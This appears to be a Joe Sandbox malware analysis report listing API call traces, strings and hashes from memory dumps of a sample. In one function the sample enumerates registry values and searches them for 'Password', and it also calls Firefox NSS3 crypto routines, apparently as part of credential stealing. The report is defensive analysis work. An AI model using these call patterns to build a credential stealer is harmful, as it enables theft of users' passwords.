Part of subcall function 017E6CD0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 017E6E0D
Part of subcall function 017E6CD0: GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,017E7690,80000001,017F42AE,?,?,?,?,?,017E7690,?), ref: 017E6E52
Part of subcall function 017E6CD0: HeapFree.KERNEL32(00000000,?,?,?,?,017E7690,80000001,017F42AE,?,?,?,?,?,017E7690,?), ref: 017E6E59

lstrcat.KERNEL32(00000000,017FF04C), ref: 017E7006
lstrcat.KERNEL32(00000000,00000000), ref: 017E7048
lstrcat.KERNEL32(00000000, : ), ref: 017E705A
lstrcat.KERNEL32(00000000,00000000), ref: 017E708F
lstrcat.KERNEL32(00000000,017FF054), ref: 017E70A0
lstrcat.KERNEL32(00000000,00000000), ref: 017E70D3
lstrcat.KERNEL32(00000000,017FF058), ref: 017E70ED
task.LIBCPMTD ref: 017E70FB

Strings

: , xrefs: 017E704E

Memory Dump Source

Source File: 00000000.00000002.2244768621.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true

Associated: 00000000.00000002.2244768621.000000000182E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000188A000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000192D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A05000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A17000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17e0000_jlO7971vUz.jbxd

Yara matches

Similarity

API ID: lstrcat$Heap$EnumFreeOpenProcessValuememsettask
String ID: :
API String ID: 3191641157-3653984579
Opcode ID: f10410b4502964d5904f62c3b989b463a378f24cef46797617384a750653e3fa
Instruction ID: b7bea04b62b2bfb47614ed4a34a25e8969b0a8eb992abeeb2fa724f299ef3158
Opcode Fuzzy Hash: f10410b4502964d5904f62c3b989b463a378f24cef46797617384a750653e3fa
Instruction Fuzzy Hash: 743147B5D01105DFCF19EFA4D99DDAFB7F8AB58301F148018E2066B288DA746E06CB91

Function 6C550F30 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 85memoryCOMMON

Download Yara Rule

APIs

PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6C550F62
SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6C550F84

Part of subcall function 6C5AB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C6818D0,?), ref: 6C5AB095

SEC_QuickDERDecodeItem_Util.NSS3(?,6C56F59B,6C67890C,?), ref: 6C550FA8
PORT_Alloc_Util.NSS3(4C8B1474), ref: 6C550FC1

Part of subcall function 6C5B0BE0: malloc.MOZGLUE(6C5A8D2D,?,00000000,?), ref: 6C5B0BF8
Part of subcall function 6C5B0BE0: TlsGetValue.KERNEL32(6C5A8D2D,?,00000000,?), ref: 6C5B0C15

memcpy.VCRUNTIME140(00000000,?,4C8B1474), ref: 6C550FDB
PR_CallOnce.NSS3(6C6B2AA4,6C5B12D0), ref: 6C550FEF
PL_FreeArenaPool.NSS3(?), ref: 6C551001
PL_FinishArenaPool.NSS3(?), ref: 6C551009

Strings

security, xrefs: 6C550F5C

Memory Dump Source

Source File: 00000000.00000002.2272154042.000000006C4D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4D0000, based on PE: true

Associated: 00000000.00000002.2272139997.000000006C4D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272277975.000000006C66F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272310050.000000006C6AE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272327726.000000006C6AF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272342202.000000006C6B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272358768.000000006C6B5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4d0000_jlO7971vUz.jbxd

Similarity

API ID: ArenaPoolUtil$DecodeItem_Quick$Alloc_CallErrorFinishFreeInitOnceValuemallocmemcpy
String ID: security
API String ID: 2061345354-3315324353
Opcode ID: c6cb48641b2340c33bca838105f9b5be7f6097e0dda65fd3616fbad12f36488b
Instruction ID: d3bf7f12f3ec6b96a37c0a1d9779f87de3d9fd7a65b81baa6c381810acba2aec
Opcode Fuzzy Hash: c6cb48641b2340c33bca838105f9b5be7f6097e0dda65fd3616fbad12f36488b
Instruction Fuzzy Hash: BA21D7B1904304ABD7109F25DC81AAFBBB4EF8565CF048519FC1896601FB31E955CBE6

Function 6C556DB0 Relevance: 15.2, APIs: 10, Instructions: 200memoryCOMMON

Download Yara Rule

APIs

SECITEM_ArenaDupItem_Util.NSS3(?,6C557D8F,6C557D8F,?,?), ref: 6C556DC8

Part of subcall function 6C5AFDF0: PORT_ArenaAlloc_Util.NSS3(?,0000000C,00000000,?,?), ref: 6C5AFE08
Part of subcall function 6C5AFDF0: PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?), ref: 6C5AFE1D
Part of subcall function 6C5AFDF0: memcpy.VCRUNTIME140(00000000,?,?,?,?,?,?), ref: 6C5AFE62

PORT_ArenaAlloc_Util.NSS3(?,00000010,?,?,6C557D8F,?,?), ref: 6C556DD5

Part of subcall function 6C5B10C0: TlsGetValue.KERNEL32(?,6C558802,00000000,00000008,?,6C54EF74,00000000), ref: 6C5B10F3
Part of subcall function 6C5B10C0: EnterCriticalSection.KERNEL32(?,?,6C558802,00000000,00000008,?,6C54EF74,00000000), ref: 6C5B110C
Part of subcall function 6C5B10C0: PL_ArenaAllocate.NSS3(?,?,?,6C558802,00000000,00000008,?,6C54EF74,00000000), ref: 6C5B1141
Part of subcall function 6C5B10C0: PR_Unlock.NSS3(?,?,?,6C558802,00000000,00000008,?,6C54EF74,00000000), ref: 6C5B1182
Part of subcall function 6C5B10C0: TlsGetValue.KERNEL32(?,6C558802,00000000,00000008,?,6C54EF74,00000000), ref: 6C5B119C

SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6C678FA0,00000000,?,?,?,?,6C557D8F,?,?), ref: 6C556DF7

Part of subcall function 6C5AB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C6818D0,?), ref: 6C5AB095

SECITEM_ArenaDupItem_Util.NSS3(?,00000000), ref: 6C556E35

Part of subcall function 6C5AFDF0: PORT_Alloc_Util.NSS3(0000000C,00000000,?,?), ref: 6C5AFE29
Part of subcall function 6C5AFDF0: PORT_Alloc_Util.NSS3(?,?,?,?), ref: 6C5AFE3D
Part of subcall function 6C5AFDF0: free.MOZGLUE(00000000,?,?,?,?), ref: 6C5AFE6F

PORT_ArenaAlloc_Util.NSS3(?,0000005C), ref: 6C556E4C

Part of subcall function 6C5B10C0: PL_ArenaAllocate.NSS3(?,6C558802,00000000,00000008,?,6C54EF74,00000000), ref: 6C5B116E

SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6C678FE0,00000000), ref: 6C556E82

Part of subcall function 6C556AF0: SECITEM_ArenaDupItem_Util.NSS3(00000000,6C55B21D,00000000,00000000,6C55B219,?,6C556BFB,00000000,?,00000000,00000000,?,?,?,6C55B21D), ref: 6C556B01
Part of subcall function 6C556AF0: SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,00000000), ref: 6C556B8A

SECITEM_ArenaDupItem_Util.NSS3(?,00000000), ref: 6C556F1E
PORT_ArenaAlloc_Util.NSS3(?,0000005C), ref: 6C556F35
SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6C678FE0,00000000), ref: 6C556F6B
PR_SetError.NSS3(FFFFE005,00000000,6C557D8F,?,?), ref: 6C556FE1

Memory Dump Source

Source File: 00000000.00000002.2272154042.000000006C4D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4D0000, based on PE: true

Associated: 00000000.00000002.2272139997.000000006C4D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272277975.000000006C66F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272310050.000000006C6AE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272327726.000000006C6AF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272342202.000000006C6B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272358768.000000006C6B5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4d0000_jlO7971vUz.jbxd

Similarity

API ID: Util$Arena$Item_$Alloc_$DecodeQuick$AllocateErrorValue$CriticalEnterSectionUnlockfreememcpy
String ID:
API String ID: 587344769-0
Opcode ID: 042851e862fcf1edbd83069a6a13081648e22d1f26a8f2025ed84ad3316c36ba
Instruction ID: 9505cd2cc0d023f0f555f083d5c1e94f78f26764e0a798cdad87ab4d028937b0
Opcode Fuzzy Hash: 042851e862fcf1edbd83069a6a13081648e22d1f26a8f2025ed84ad3316c36ba
Instruction Fuzzy Hash: DC717271E107869FDB00CF55CD40BAABBA4BF94348F554226E808D7B11FB71E9A4CB90

Function 6C590FE0 Relevance: 15.2, APIs: 10, Instructions: 192memorystringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C591057
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C591085
PK11_GetAllTokens.NSS3 ref: 6C5910B1
free.MOZGLUE(?), ref: 6C591107
PR_SetError.NSS3(00000000,00000000), ref: 6C591172
free.MOZGLUE(?), ref: 6C591182
free.MOZGLUE(?), ref: 6C5911A6
SECITEM_ItemsAreEqual_Util.NSS3(?,?), ref: 6C5911C5

Part of subcall function 6C5952C0: TlsGetValue.KERNEL32(?,00000001,00000002,?,?,?,?,?,?,?,?,?,?,6C56EAC5,00000001), ref: 6C5952DF
Part of subcall function 6C5952C0: EnterCriticalSection.KERNEL32(?), ref: 6C5952F3
Part of subcall function 6C5952C0: PR_Unlock.NSS3(?), ref: 6C595358

PORT_ZAlloc_Util.NSS3(0000000C), ref: 6C5911D3
PORT_ZAlloc_Util.NSS3(0000000C), ref: 6C5911F3

Memory Dump Source

Source File: 00000000.00000002.2272154042.000000006C4D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4D0000, based on PE: true

Associated: 00000000.00000002.2272139997.000000006C4D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272277975.000000006C66F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272310050.000000006C6AE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272327726.000000006C6AF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272342202.000000006C6B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272358768.000000006C6B5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4d0000_jlO7971vUz.jbxd

Similarity

API ID: Utilfree$Alloc_Error$CriticalEnterEqual_ItemsK11_SectionTokensUnlockValuestrlen
String ID:
API String ID: 1549229083-0
Opcode ID: 39a1f165a1fe9f721de7d204ac47bcc3c2223e9f39b20f8d7ed73eeeff0e26b2
Instruction ID: 99825ddc1c27a9d24ace1f22f58fdcb35f1d4280b954afa969ed5d7002a4e6ca
Opcode Fuzzy Hash: 39a1f165a1fe9f721de7d204ac47bcc3c2223e9f39b20f8d7ed73eeeff0e26b2
Instruction Fuzzy Hash: 7E61A7B0E00395ABEB00DFA5DC81BAFB7B9AF44348F144168ED19AB741E731E945CB51

Function 6C59ADC0 Relevance: 15.1, APIs: 10, Instructions: 148COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,6C57CDBB,?,6C57D079,00000000,00000001), ref: 6C59AE10
EnterCriticalSection.KERNEL32(?,?,6C57CDBB,?,6C57D079,00000000,00000001), ref: 6C59AE24
PR_Unlock.NSS3(?,?,?,?,?,?,6C57D079,00000000,00000001), ref: 6C59AE5A
memset.VCRUNTIME140(85145F8B,00000000,8D1474DB,?,6C57CDBB,?,6C57D079,00000000,00000001), ref: 6C59AE6F
free.MOZGLUE(85145F8B,?,?,?,?,6C57CDBB,?,6C57D079,00000000,00000001), ref: 6C59AE7F
TlsGetValue.KERNEL32(?,6C57CDBB,?,6C57D079,00000000,00000001), ref: 6C59AEB1
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6C57CDBB,?,6C57D079,00000000,00000001), ref: 6C59AEC9
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,6C57CDBB,?,6C57D079,00000000,00000001), ref: 6C59AEF1
free.MOZGLUE(6C57CDBB,?,?,?,?,?,?,?,?,?,?,?,?,?,6C57CDBB,?), ref: 6C59AF0B
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,6C57CDBB,?,6C57D079,00000000,00000001), ref: 6C59AF30

Memory Dump Source

Source File: 00000000.00000002.2272154042.000000006C4D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4D0000, based on PE: true

Associated: 00000000.00000002.2272139997.000000006C4D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272277975.000000006C66F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272310050.000000006C6AE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272327726.000000006C6AF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272342202.000000006C6B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272358768.000000006C6B5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4d0000_jlO7971vUz.jbxd

Similarity

API ID: Unlock$CriticalEnterSectionValuefree$memset
String ID:
API String ID: 161582014-0
Opcode ID: 01aa3c5f0399a622e2103336232c47cf9e916cd313e295d24b700ae20e2b4920
Instruction ID: 79a3b8d87f543f78756217490fdee227b137197ccd388d0effcf6bb17343bd4f
Opcode Fuzzy Hash: 01aa3c5f0399a622e2103336232c47cf9e916cd313e295d24b700ae20e2b4920
Instruction Fuzzy Hash: A7516DB5E00642EFDB01DF29DC84B6AB7B4BF05318F1446A5E81997A11E731F8A4CBE1

Function 6C574CA0 Relevance: 15.1, APIs: 10, Instructions: 142COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,00000000,00000000,?,6C57AB7F,?,00000000,?), ref: 6C574CB4
EnterCriticalSection.KERNEL32(0000001C,?,6C57AB7F,?,00000000,?), ref: 6C574CC8
TlsGetValue.KERNEL32(?,6C57AB7F,?,00000000,?), ref: 6C574CE0
EnterCriticalSection.KERNEL32(?,?,6C57AB7F,?,00000000,?), ref: 6C574CF4
PL_HashTableLookup.NSS3(?,?,?,6C57AB7F,?,00000000,?), ref: 6C574D03
PR_Unlock.NSS3(?,00000000,?), ref: 6C574D10

Part of subcall function 6C5FDD70: TlsGetValue.KERNEL32 ref: 6C5FDD8C
Part of subcall function 6C5FDD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C5FDDB4

PR_Now.NSS3(?,00000000,?), ref: 6C574D26

Part of subcall function 6C619DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6C660A27), ref: 6C619DC6
Part of subcall function 6C619DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6C660A27), ref: 6C619DD1
Part of subcall function 6C619DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C619DED

PR_Unlock.NSS3(?,?,00000000,?), ref: 6C574D98
PR_Unlock.NSS3(?,?,?,00000000,?), ref: 6C574DDA
PR_Unlock.NSS3(?,?,?,?,00000000,?), ref: 6C574E02

Memory Dump Source

Source File: 00000000.00000002.2272154042.000000006C4D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4D0000, based on PE: true

Associated: 00000000.00000002.2272139997.000000006C4D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272277975.000000006C66F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272310050.000000006C6AE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272327726.000000006C6AF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272342202.000000006C6B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272358768.000000006C6B5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4d0000_jlO7971vUz.jbxd

Similarity

API ID: Unlock$CriticalSectionTimeValue$EnterSystem$FileHashLeaveLookupTableUnothrow_t@std@@@__ehfuncinfo$??2@
String ID:
API String ID: 4032354334-0
Opcode ID: 9313b9acd49389df3d988a09bfb35bb9ed43550edba86c7300a52109bde08922
Instruction ID: 2a6354167097af027a873ddebddef5c9ff618b6e34283ee997da1bf29ed21bbb
Opcode Fuzzy Hash: 9313b9acd49389df3d988a09bfb35bb9ed43550edba86c7300a52109bde08922
Instruction Fuzzy Hash: A541D8B5900201EBEB119F65EC8096A77B8AF45258F044570EC19C7B22FB31DD64CBF2

Function 6C5789C0 Relevance: 15.1, APIs: 10, Instructions: 84COMMON

Download Yara Rule

APIs

PK11_CreateDigestContext.NSS3(00000004,00000000,00000000,00000000,00000000,?,6C57AE9B,00000000,?,?), ref: 6C5789DE
PK11_DigestBegin.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,6C552D6B,?,?,00000000), ref: 6C5789EF
PK11_DigestOp.NSS3(00000000,57016AC6,034C08E8,?,00000000,?,?,?,?,?,?,?,?,?,?,6C552D6B), ref: 6C578A02
PK11_DestroyContext.NSS3(00000000,00000001,?,00000000,?,?,?,?,?,?,?,?,?,?,6C552D6B,?), ref: 6C578A11

Memory Dump Source

Source File: 00000000.00000002.2272154042.000000006C4D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4D0000, based on PE: true

Associated: 00000000.00000002.2272139997.000000006C4D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272277975.000000006C66F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272310050.000000006C6AE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272327726.000000006C6AF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272342202.000000006C6B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272358768.000000006C6B5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4d0000_jlO7971vUz.jbxd

Similarity

API ID: K11_$Digest$Context$BeginCreateDestroy
String ID:
API String ID: 407214398-0
Opcode ID: 8cfcebcf3c7842c6369d768606bd774668fc518f95117ec52a3454da25ecd42c
Instruction ID: e0c65ee5e53650c8d8318fe46801310ae6cb3b7a213411999855edd4b2151a3a
Opcode Fuzzy Hash: 8cfcebcf3c7842c6369d768606bd774668fc518f95117ec52a3454da25ecd42c
Instruction Fuzzy Hash: E611D8F1E00300A6FF2056656C81BBB7558DB8176CF080036ED09BAA42F762D998C2B3

Function 6C552E00 Relevance: 15.1, APIs: 10, Instructions: 78COMMON

Download Yara Rule

APIs

SECITEM_DupItem_Util.NSS3(-0000003C,00000000,00000000,?,?,?,6C552CDA,?,00000000), ref: 6C552E1E

Part of subcall function 6C5AFD80: PORT_Alloc_Util.NSS3(0000000C,?,?,00000001,?,6C559003,?), ref: 6C5AFD91
Part of subcall function 6C5AFD80: PORT_Alloc_Util.NSS3(A4686C5B,?), ref: 6C5AFDA2
Part of subcall function 6C5AFD80: memcpy.VCRUNTIME140(00000000,12D068C3,A4686C5B,?,?), ref: 6C5AFDC4

SECITEM_DupItem_Util.NSS3(?), ref: 6C552E33

Part of subcall function 6C5AFD80: free.MOZGLUE(00000000,?,?), ref: 6C5AFDD1

TlsGetValue.KERNEL32 ref: 6C552E4E
EnterCriticalSection.KERNEL32(?), ref: 6C552E5E
PL_HashTableLookup.NSS3(?), ref: 6C552E71
PL_HashTableRemove.NSS3(?), ref: 6C552E84
PL_HashTableAdd.NSS3(?,00000000), ref: 6C552E96
PR_Unlock.NSS3 ref: 6C552EA9
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C552EB6
PR_SetError.NSS3(FFFFE013,00000000), ref: 6C552EC5

Memory Dump Source

Source File: 00000000.00000002.2272154042.000000006C4D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4D0000, based on PE: true

Associated: 00000000.00000002.2272139997.000000006C4D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272277975.000000006C66F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272310050.000000006C6AE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272327726.000000006C6AF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272342202.000000006C6B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272358768.000000006C6B5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4d0000_jlO7971vUz.jbxd

Similarity

API ID: Util$HashItem_Table$Alloc_$CriticalEnterErrorLookupRemoveSectionUnlockValueZfreefreememcpy
String ID:
API String ID: 3332421221-0
Opcode ID: 8a4e7c2738825fc0a17f099156f8a96b3a1bce8887ece9d886b8873a19011262
Instruction ID: ae4bddf9fbd1686b28c6232e57448a74da7e5c7794a5dd4d8a414b2e1d98fc40
Opcode Fuzzy Hash: 8a4e7c2738825fc0a17f099156f8a96b3a1bce8887ece9d886b8873a19011262
Instruction Fuzzy Hash: 86210772B00101A7EF015B66EC49AAB3BB5EB9234DF040531ED1892711FB32D979C7E9

Function 6C4DCEC0 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 199COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00010A7E,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,00000000,?,00000000,?,?,6C4DB999), ref: 6C4DCFF3
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000109DA,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,00000000,?,00000000,?,?,6C4DB999), ref: 6C4DD02B
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00010A70,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?,00000000,?,?,6C4DB999), ref: 6C4DD041
_byteswap_ushort.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,6C4DB999), ref: 6C62972B

Strings

%s at line %d of [%.10s], xrefs: 6C4DCFEC, 6C4DD018, 6C4DD029, 6C4DD03F, 6C62978B
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C4DCFDD, 6C4DD00E, 6C4DD022, 6C4DD033, 6C629780
database corruption, xrefs: 6C4DCFE7, 6C4DD013, 6C4DD028, 6C4DD039, 6C4DD03E, 6C629786

Memory Dump Source

Source File: 00000000.00000002.2272154042.000000006C4D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4D0000, based on PE: true

Associated: 00000000.00000002.2272139997.000000006C4D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272277975.000000006C66F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272310050.000000006C6AE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272327726.000000006C6AF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272342202.000000006C6B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272358768.000000006C6B5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4d0000_jlO7971vUz.jbxd

Similarity

API ID: sqlite3_log$_byteswap_ushort
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 491875419-598938438
Opcode ID: 1f28058fcc17521b18f971ec7a1ff5726b00248dfc45245b1565e6581948098f
Instruction ID: 19d35dbdd1f7ebc43dec96b6137438d5ce34a53e22b2478f5f3be6bbd93941c3
Opcode Fuzzy Hash: 1f28058fcc17521b18f971ec7a1ff5726b00248dfc45245b1565e6581948098f
Instruction Fuzzy Hash: 6F612671A042108BD310DF29C840FA6B7F5EF85318F29416DE4889FB82D37AE947CBA5

Function 6C5B4DF0 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 184memoryCOMMON

Download Yara Rule

APIs

isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,00000022,?,?,6C5B536F,00000022,?,?,00000000,?), ref: 6C5B4E70
PORT_ZAlloc_Util.NSS3(00000000), ref: 6C5B4F28
PR_smprintf.NSS3(%s=%s,?,00000000), ref: 6C5B4F8E
PR_smprintf.NSS3(%s=%c%s%c,?,?,00000000,?), ref: 6C5B4FAE
free.MOZGLUE(?), ref: 6C5B4FC8

Strings

%s=%s, xrefs: 6C5B4F89
oS[l", xrefs: 6C5B4DFB, 6C5B4EF4, 6C5B4EC5
%s=%c%s%c, xrefs: 6C5B4FA9

Memory Dump Source

Source File: 00000000.00000002.2272154042.000000006C4D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4D0000, based on PE: true

Associated: 00000000.00000002.2272139997.000000006C4D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272277975.000000006C66F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272310050.000000006C6AE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272327726.000000006C6AF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272342202.000000006C6B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272358768.000000006C6B5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4d0000_jlO7971vUz.jbxd

Similarity

API ID: R_smprintf$Alloc_Utilfreeisspace
String ID: %s=%c%s%c$%s=%s$oS[l"
API String ID: 2709355791-1088360453
Opcode ID: 74bc38e3519247001cbc521f34ce7782b309d76d80a4dfe27def39ea1af25f21
Instruction ID: ee480c7327bda43be93586d606706b1cc6e9dd3d9da7858c1550716052e96582
Opcode Fuzzy Hash: 74bc38e3519247001cbc521f34ce7782b309d76d80a4dfe27def39ea1af25f21
Instruction Fuzzy Hash: 90513771A051559BEB21CAA98CB07FF7FF59F42308F288125F894B7B41D335980587A2

Function 017E6CD0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 149registrymemoryCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 017E6D14
RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,017E7690), ref: 017E6D3A
RegEnumValueA.ADVAPI32(017E7690,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 017E6DB1
StrStrA.SHLWAPI(00000000,Password,00000000), ref: 017E6E0D
GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,017E7690,80000001,017F42AE,?,?,?,?,?,017E7690,?), ref: 017E6E52
HeapFree.KERNEL32(00000000,?,?,?,?,017E7690,80000001,017F42AE,?,?,?,?,?,017E7690,?), ref: 017E6E59

Part of subcall function 017E8C40: vsprintf_s.MSVCRT ref: 017E8C5B

task.LIBCPMTD ref: 017E6F55

Strings

Password, xrefs: 017E6E01

Memory Dump Source

Source File: 00000000.00000002.2244768621.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true

Associated: 00000000.00000002.2244768621.000000000182E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000188A000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000192D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A05000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A17000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17e0000_jlO7971vUz.jbxd

Yara matches

Similarity

API ID: Heap$EnumFreeOpenProcessValuememsettaskvsprintf_s
String ID: Password
API String ID: 2698061284-3434357891
Opcode ID: 579f81202bf81563f198e9a402e2737bf4da4194cbb189790f2befc76d9f61a0
Instruction ID: d7ba6ba61d94406fbefa0d867bbbf5a6228fceb9d4df75d28779535ecd4b538d
Opcode Fuzzy Hash: 579f81202bf81563f198e9a402e2737bf4da4194cbb189790f2befc76d9f61a0
